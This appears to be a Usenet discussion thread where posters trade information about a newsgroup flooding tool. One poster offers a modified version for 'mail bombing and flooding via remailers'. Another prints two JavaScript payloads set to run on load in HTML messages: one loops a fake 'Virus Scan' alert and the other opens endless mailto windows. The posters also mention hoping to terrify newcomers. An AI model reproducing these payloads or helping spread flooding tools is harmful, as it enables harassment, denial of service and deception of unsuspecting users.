I don't know. I've been looking for it for about a year (to study,
not to use in the wild) and haven't been able to find it. Good luck
and please post if you find it.

Can you suggest a group to post it to?

Try requesting in the hipcrime groups.

Weird, I thought hipcrime was older than java! I'm glad you've got
the source code.
I suggest you make it available by P2P and post it to an apropriate
binaries group (and post here to tell me where you posted that).
Would you be willing to put it on some webspace?
Thanks!

My server doesn't carry hipcrime groups.

I don't have the original any more but I have a version I altered a little
to handle SMTP and Mixmaster. It's very good for mail bombing and flooding
via remailers. I will post it to alt.binaries.freeware.

I'd really love to see your version that can do SMTP!
If you did indeed post it in alt.binaries.freeware it must have already
expired on my server.
Any chance you can post it again? (I'd love to see the source too!)
Thanks!

There were actually 2 variation which were nothing but infinitely
looping Java script in an HTML message set off with OnLoad.
Obviously this would only work on people silly enough to be using
a "newreader" that would run Java script.
Not exactly rocket science but you'd be surprised how many people
fell for the Virus Scan message.
This one was the phony Virus Scan message that wouldn't go away:
function hehe()
{
while (true)
window.alert("Virus Scan had detected the alt.config virus etc etc")
}
And this one opened up endless email windows:
function haha()
{
while (true)
window.open("mailto:XXXX.you@haha.sucker")
}

I don't believe it was posted.

Wow "alt.config virus" sure gets a ton of google hits for being basicly a
silly little joke (no insult intended).
Too bad there aren't "any?" javascript enabled newsreaders around these
days. The right message could send newbies screaming (and posting) in terror.

*nod* and if I'd been needing privacy, they'd have gotten the I.P. address
of a Tor exit node and a ficticious browser ident string.
